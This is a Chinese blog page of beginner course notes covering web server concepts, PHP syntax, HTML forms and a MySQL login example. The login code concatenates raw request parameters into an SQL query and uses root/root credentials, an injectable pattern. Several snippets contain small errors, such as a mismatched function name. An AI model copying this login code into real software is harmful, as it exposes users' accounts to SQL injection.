<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>MySite</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="一、web服务器通信原理1.1常见服务器系统服务器 + 系统 服务器操作系统：针对于服务器的操作系统（内置服务器所使用的东西）如：Windows Server 理解概念:  路径  绝对路径：以根目录为参考系 相对路径：以当前文件为参考系    IP:互联网协议地址（ipv4：0.0.0.0 ——255.255.255.255）  公网（外网）IP （有限）：真实存在的地址（百度 ip 查看） 内">
<meta property="og:type" content="article">
<meta property="og:title" content="MySite">
<meta property="og:url" content="http://example.com/2021/11/20/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="MySite">
<meta property="og:description" content="一、web服务器通信原理1.1常见服务器系统服务器 + 系统 服务器操作系统：针对于服务器的操作系统（内置服务器所使用的东西）如：Windows Server 理解概念:  路径  绝对路径：以根目录为参考系 相对路径：以当前文件为参考系    IP:互联网协议地址（ipv4：0.0.0.0 ——255.255.255.255）  公网（外网）IP （有限）：真实存在的地址（百度 ip 查看） 内">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https:\\xxxxxx">
<meta property="article:published_time" content="2021-11-20T11:41:35.638Z">
<meta property="article:modified_time" content="2022-02-16T11:12:43.254Z">
<meta property="article:author" content="BlueDog">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https:\\xxxxxx">
  
    <link rel="alternate" href="/atom.xml" title="MySite" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">MySite</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-课程笔记" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2021/11/20/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/" class="article-date">
  <time class="dt-published" datetime="2021-11-20T11:41:35.638Z" itemprop="datePublished">2021-11-20</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="一、web服务器通信原理"><a href="#一、web服务器通信原理" class="headerlink" title="一、web服务器通信原理"></a>一、web服务器通信原理</h1><h2 id="1-1常见服务器系统"><a href="#1-1常见服务器系统" class="headerlink" title="1.1常见服务器系统"></a>1.1常见服务器系统</h2><p>服务器 + 系统</p>
<p>服务器操作系统：针对于服务器的操作系统（内置服务器所使用的东西）如：Windows Server</p>
<p><strong>理解概念:</strong></p>
<blockquote>
<p>路径</p>
<ul>
<li>绝对路径：以根目录为参考系</li>
<li>相对路径：以当前文件为参考系</li>
</ul>
</blockquote>
<blockquote>
<p>IP:互联网协议地址（ipv4：0.0.0.0 ——255.255.255.255）</p>
<ul>
<li>公网（外网）IP <strong>（有限）</strong>：真实存在的地址（百度 ip 查看）</li>
<li>内网IP <strong>（无限）</strong>：内部存在的地址 （使用同一路由器存在于同一内网）（cmd ipconfig查找）</li>
</ul>
</blockquote>
<blockquote>
<p>DNS协议：ip和域名的转换</p>
</blockquote>
<blockquote>
<p>域名(任何域名都可以指向不同ip)</p>
<ul>
<li>顶级域名：baidu.com</li>
<li>二级域名：<a target="_blank" rel="noopener" href="http://www.baidu.com/">www.baidu.com</a></li>
<li>三级域名：a.b.baidu.com</li>
<li>多级域名：a.b.c.baidu.com</li>
</ul>
</blockquote>
<blockquote>
<p>HTTP/HTTPS协议</p>
</blockquote>
<p><strong>掌握：</strong></p>
<blockquote>
<p>cmd 基础命令</p>
<ul>
<li>dir</li>
<li>cd<ul>
<li><strong>./</strong> (当前目录) </li>
<li><strong>../</strong>(上级目录)</li>
</ul>
</li>
<li>tesklist 进程列表</li>
<li>ping</li>
</ul>
</blockquote>
<h1 id="二、web环境搭建"><a href="#二、web环境搭建" class="headerlink" title="二、web环境搭建"></a>二、web环境搭建</h1><p><strong>理解概念:</strong></p>
<blockquote>
<p>前端：前端即网站前台部分，运行在PC端，移动端等浏览器上展现给用户浏览的网页。</p>
</blockquote>
<blockquote>
<p>后端：多数后端开发人员从事于构建他们正在工作的应用程序背后的实际逻辑。</p>
</blockquote>
<p>   <strong>前端开发人员构建用户界面，而后端开发人员编写代码，使其工作。</strong></p>
<p><strong>掌握</strong></p>
<blockquote>
<p>phpstudy安装<br>数据库安装</p>
</blockquote>
<blockquote>
<p>cms搭建</p>
<ol>
<li>配置php文件端口</li>
<li>将upload文件内容复制到php环境目录下</li>
<li>浏览器访问网站</li>
</ol>
</blockquote>
<p><strong>遇到的问题</strong></p>
<ol>
<li>主机不能ping虚拟机，而虚拟机能ping主机</li>
</ol>
<ul>
<li>方法一： 关闭虚拟机防火墙</li>
<li>方法二：进入“入站规则”，添加新规则，开放端口（网站对应端口）   </li>
</ul>
<ol start="2">
<li>访问不了网站根目录下的1.txt文件解决方法：查看是否打开文件扩展名  </li>
</ol>
<h1 id="三、后端PHP基础"><a href="#三、后端PHP基础" class="headerlink" title="三、后端PHP基础"></a>三、后端PHP基础</h1><h2 id="3-1-PHP基本概念"><a href="#3-1-PHP基本概念" class="headerlink" title="3.1  PHP基本概念"></a>3.1  PHP基本概念</h2><ol>
<li>PHP标识符</li>
</ol>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Renyi-Fan/p/11257874.html">详解PHP语法标识符</a></p>
</blockquote>
<h2 id="3-2-PHP基础语法"><a href="#3-2-PHP基础语法" class="headerlink" title="3.2 PHP基础语法"></a>3.2 PHP基础语法</h2><h3 id="1-输出"><a href="#1-输出" class="headerlink" title="1. 输出"></a>1. 输出</h3><ul>
<li><p>echo：直接输出</p>
</li>
<li><p>var_dump：同时输出信息及其类型</p>
</li>
<li><p>各段字符连接(.)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;hello&#x27;</span>.<span class="string">&#x27;world&#x27;</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="2-变量与常量"><a href="#2-变量与常量" class="headerlink" title="2. 变量与常量"></a>2. 变量与常量</h3><ul>
<li><p>变量申明（$）</p>
  <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="number">1</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$a</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<pre><code>  变量在第一次赋值给它的时候被创建
</code></pre>
</li>
<li><p>变量要求规范</p>
<ol>
<li>变量以 $ 符号开始，后面跟着变量的名称</li>
<li>变量名必须以字母或者下划线字符开始</li>
<li>变量名只能包含字母、数字以及下划线（A-z、0-9 和 _ ）</li>
<li>变量名不能包含空格</li>
<li>变量名是区分大小写的（$y 和 $Y 是两个不同的变量）</li>
</ol>
</li>
<li><p>常量申明（define(常量名，常量值)）</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">define(a,<span class="number">12</span>);</span><br><span class="line"><span class="keyword">echo</span> a ;</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="3-函数"><a href="#3-函数" class="headerlink" title="3. 函数"></a>3. 函数</h3><blockquote>
<p>调用方式：函数名（）<br>   <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> <span class="keyword">echo</span> md5(<span class="string">&#x27;admin&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span>   </span><br></pre></td></tr></table></figure></p>
</blockquote>
<blockquote>
<p>函数自定义(function)</p>
</blockquote>
<pre><code><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">jiafa</span> (<span class="params"><span class="variable">$a</span>,<span class="variable">$b</span></span>)</span>&#123;</span><br><span class="line"> <span class="variable">$c</span> = <span class="number">0</span>;</span><br><span class="line"> <span class="variable">$c</span> = <span class="variable">$a</span> + <span class="variable">$b</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$c</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">jia(<span class="number">1</span>,<span class="number">2</span>);</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>
</code></pre>
<blockquote>
<p>常用函数：</p>
<ul>
<li>sleep（）</li>
<li>var_dump</li>
</ul>
</blockquote>
<h3 id="4-运算符"><a href="#4-运算符" class="headerlink" title="4. 运算符"></a>4. 运算符</h3><p>  <a target="_blank" rel="noopener" href="https://www.runoob.com/php/php-operators.html">点击查看详细</a></p>
<ul>
<li><p>算数运算符</p>
</li>
<li><p>逻辑运算符</p>
</li>
<li><p>赋值运算符</p>
</li>
<li><p>递增/递减运算符</p>
</li>
<li><p>比较运算符</p>
</li>
<li><p>数组运算符</p>
</li>
</ul>
<h3 id="5-条件分支语句"><a href="#5-条件分支语句" class="headerlink" title="5. 条件分支语句"></a>5. 条件分支语句</h3><ul>
<li><p>if 语句</p>
<p>  语法：</p>
<p>  if (条件){</p>
<p>  条件成立时要执行的代码;</p>
<pre><code>&#125;
</code></pre>
<p>  如果当前时间小于 20，下面的实例将输出 “Have a good day!”：</p>
  <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$t</span>=date(<span class="string">&quot;H&quot;</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$t</span>&lt;<span class="string">&quot;20&quot;</span>)</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;Have a good day!&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></li>
<li><p>if…else</p>
<p>  语法：</p>
<p>  if (条件) {</p>
<p>  条件成立时执行的代码;</p>
<p>  }</p>
<p>  else{</p>
<p>  条件不成立时执行的代码;</p>
<p>  }</p>
<p>  如果当前时间小于 20，下面的实例将输出 “Have a good day!”，否则输出 “Have a good night!”：</p>
  <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$t</span>=date(<span class="string">&quot;H&quot;</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$t</span>&lt;<span class="string">&quot;20&quot;</span>)</span><br><span class="line">&#123;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">&quot;Have a good day!&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">&quot;Have a good night!&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span>     </span><br></pre></td></tr></table></figure></li>
<li><p>switc语句</p>
  <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">switch</span> (n)</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">case</span> label1:</span><br><span class="line">如果 n=label1，此处代码将执行;</span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> label2:</span><br><span class="line">如果 n=label2，此处代码将执行;</span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">default</span>:</span><br><span class="line">如果 n 既不等于 label1 也不等于 label2，此处代码将执行;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span>    </span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="6-循环语句"><a href="#6-循环语句" class="headerlink" title="6. 循环语句"></a>6. 循环语句</h3><ul>
<li><p>while循环</p>
<p>  语法：</p>
<p>  while（条件）{</p>
<p>  执行的代码；</p>
<p>  }</p>
  <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$i</span>=<span class="number">1</span>;</span><br><span class="line"><span class="keyword">while</span>(<span class="variable">$i</span>&lt;=<span class="number">5</span>)</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;The number is &quot;</span> . <span class="variable">$i</span> . <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="variable">$i</span>++;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></li>
<li><p>for循环</p>
<p>  语法：<br>  for (初始值; 条件; 增量)</p>
<p>  {</p>
<p>  要执行的代码;</p>
<p>  }</p>
<p>  下面的实例定义一个初始值为 i=1 的循环。只要变量 i 小于或者等于 5，循环将继续运行。循环每运行一次，变量 i 就会递增 1：</p>
  <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$i</span>=<span class="number">1</span>; <span class="variable">$i</span>&lt;=<span class="number">5</span>; <span class="variable">$i</span>++)</span><br><span class="line"> &#123;</span><br><span class="line">   <span class="keyword">echo</span> <span class="string">&quot;数字为 &quot;</span> . <span class="variable">$i</span> . PHP_EOL;</span><br><span class="line"> &#125;</span><br><span class="line"> <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="7-GET和POST传参"><a href="#7-GET和POST传参" class="headerlink" title="7. GET和POST传参"></a>7. GET和POST传参</h3><p>  （两种传递数据的方式）</p>
<ul>
<li><p>GET</p>
<p>  传输少量数据，有长度限制</p>
<p>  <strong>会在URL栏显示传参数据</strong></p>
<p>  $_GET =&gt; 接受GET传参</p>
</li>
<li><p>POST</p>
<p>  没有长度限制</p>
<p>  <strong>不会在URL栏显示传参数据</strong></p>
<p>  $_POST =&gt;接受POST传参</p>
<p><strong>$_REQUEST =&gt; 接受GET/POST传参</strong></p>
</li>
</ul>
<h2 id="3-3-表单验证"><a href="#3-3-表单验证" class="headerlink" title="3.3 表单验证"></a>3.3 表单验证</h2><h3 id="3-3-1-表单基础概念"><a href="#3-3-1-表单基础概念" class="headerlink" title="3.3.1 表单基础概念"></a>3.3.1 表单基础概念</h3><blockquote>
<p>表单标签：包含处理表单数据所用的动态脚本的URL以及数据提交到服务器的方法<br>    <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;URL&quot;</span> <span class="attr">methond</span> = <span class="string">&quot;GET/POST&quot;</span> <span class="attr">target</span> = <span class="string">&quot;_blank&quot;</span>&gt;</span></span><br></pre></td></tr></table></figure><br>表单域：表单的组件</p>
</blockquote>
<ul>
<li>type<pre><code>+ 普通文本框
+ 密码文本框（不可见，无法复制）
+ 数字文本框
+ 上传框（上传文件）
+ 单选框/多选框
+ 按钮
+ 提交框（提交数据）
+ 下拉框
+ 留言板（大文本框、可拖动大小）
</code></pre>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">  <span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span> <span class="meta-keyword">PUBLIC</span> <span class="meta-string">&quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot;</span> <span class="meta-string">&quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">html</span> <span class="attr">xmlns</span>=<span class="string">&quot;http://www.w3.org/1999/xhtml&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">&quot;Content-Type&quot;</span> <span class="attr">content</span>=<span class="string">&quot;text/html; charset=utf-8&quot;</span> /&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">title</span>&gt;</span>无标题文档<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;1.html&quot;</span> <span class="attr">method</span>=<span class="string">&quot;get&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> /&gt;</span>普通文本框<span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;password&quot;</span> /&gt;</span>密码文本框<span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;number&quot;</span> /&gt;</span>数字文本框<span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;file&quot;</span> /&gt;</span>上传框<span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;radio&quot;</span> <span class="attr">name</span>=<span class="string">&quot;dx&quot;</span><span class="attr">value</span>=<span class="string">&quot;单选&quot;</span>/&gt;</span>单选框<span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;checkbox&quot;</span> <span class="attr">value</span>=<span class="string">&quot;多选&quot;</span>/&gt;</span>多选<span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;button&quot;</span> /&gt;</span>按钮<span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> /&gt;</span>提交<span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;image&quot;</span> <span class="attr">src</span>=<span class="string">&quot;https://ss2.bdstatic.com/70cFvnSh_Q1YnxGkpoWK1HF6hhy/it/u=640471028,4203642916&amp;fm=26&amp;gp=0.jpg&quot;</span>/&gt;</span>图片提交按钮<span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;reset&quot;</span> /&gt;</span>重置<span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">select</span> <span class="attr">name</span>=<span class="string">&quot;月&quot;</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">1</span>&gt;</span>1月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">2</span>&gt;</span>2月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">3</span>&gt;</span>3月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">4</span>&gt;</span>4月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">5</span>&gt;</span>5月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">6</span>&gt;</span>6月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">7</span>&gt;</span>7月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">8</span>&gt;</span>8月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">9</span>&gt;</span>9月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">10</span>&gt;</span>10月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">11</span>&gt;</span>11月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">12</span>&gt;</span>12月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">option</span> <span class="attr">value</span>=<span class="string">nf</span>&gt;</span>nf月<span class="tag">&lt;/<span class="name">option</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">select</span>&gt;</span><span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">textarea</span>&gt;</span>留言板<span class="tag">&lt;/<span class="name">textarea</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br><span class="line">   </span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="3-3-2-数据库操作"><a href="#3-3-2-数据库操作" class="headerlink" title="3.3.2. 数据库操作"></a>3.3.2. 数据库操作</h3><blockquote>
<p>步骤：</p>
</blockquote>
<ol>
<li><p>数据库连接</p>
<p>   mysqli_connect(连接地址，用户名，密码，库名) </p>
</li>
<li><p>写数据库执行语句</p>
  <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sql</span> = <span class="string">&#x27;select *from admin where username=&quot;&#x27;</span>.<span class="variable">$username</span>.<span class="string">&#x27;&quot; and password =&quot;&#x27;</span>.<span class="variable">$password</span>.<span class="string">&#x27;&quot;&#x27;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>进行数据库交互</p>
<p>   mysqli_query(连接，语句)</p>
   <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">   <span class="variable">$conn</span> = mysqli_connect(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="string">&#x27;root&#x27;</span>,<span class="string">&#x27;root&#x27;</span>,<span class="string">&#x27;test&#x27;</span>);</span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&#x27;select *from admin where username=&quot;&#x27;</span>.<span class="variable">$username</span>.<span class="string">&#x27;&quot; and password =&quot;&#x27;</span>.<span class="variable">$password</span>.<span class="string">&#x27;&quot;&#x27;</span>;</span><br><span class="line"><span class="variable">$b</span> = mysqli_query(<span class="variable">$conn</span>,<span class="variable">$sql</span>);</span><br></pre></td></tr></table></figure>
</li>
<li><p>对库返回数据处理</p>
<p>   mysqli_fetch_array(返回数组)</p>
<p>   如果语句执行成功/信息匹配则返回值，否则为空</p>
<p>   判断查询是否匹配：将传参与返回值相比</p>
   <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">    @<span class="variable">$username</span> = <span class="variable">$_REQUEST</span>[<span class="string">&#x27;uname&#x27;</span>];</span><br><span class="line">    @<span class="variable">$password</span> = <span class="variable">$_REQUEST</span>[<span class="string">&#x27;pwd&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(@<span class="variable">$_REQUEST</span>[<span class="string">&#x27;uname&#x27;</span>] != <span class="string">&#x27;&#x27;</span> <span class="keyword">and</span> <span class="variable">$_REQUEST</span>[<span class="string">&#x27;pwd&#x27;</span>] != <span class="string">&#x27;&#x27;</span>)&#123;</span><br><span class="line">    <span class="variable">$conn</span> = mysqli_connect(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="string">&#x27;root&#x27;</span>,<span class="string">&#x27;root&#x27;</span>,<span class="string">&#x27;test&#x27;</span>);</span><br><span class="line"> <span class="variable">$sql</span> = <span class="string">&#x27;select *from admin where username=&quot;&#x27;</span>.<span class="variable">$username</span>.<span class="string">&#x27;&quot; and password =&quot;&#x27;</span>.<span class="variable">$password</span>.<span class="string">&#x27;&quot;&#x27;</span>;</span><br><span class="line"> <span class="variable">$b</span> = mysqli_query(<span class="variable">$conn</span>,<span class="variable">$sql</span>);</span><br><span class="line"> <span class="variable">$c</span> = mysqli_fetch_array(<span class="variable">$b</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$username</span>==<span class="variable">$c</span>[<span class="string">&#x27;username&#x27;</span>])&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;登录成功&#x27;</span>;</span><br><span class="line"> &#125;</span><br><span class="line"> <span class="keyword">else</span>&#123;<span class="keyword">echo</span> <span class="string">&#x27;账户密码错误&#x27;</span>;&#125;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure></li>
</ol>
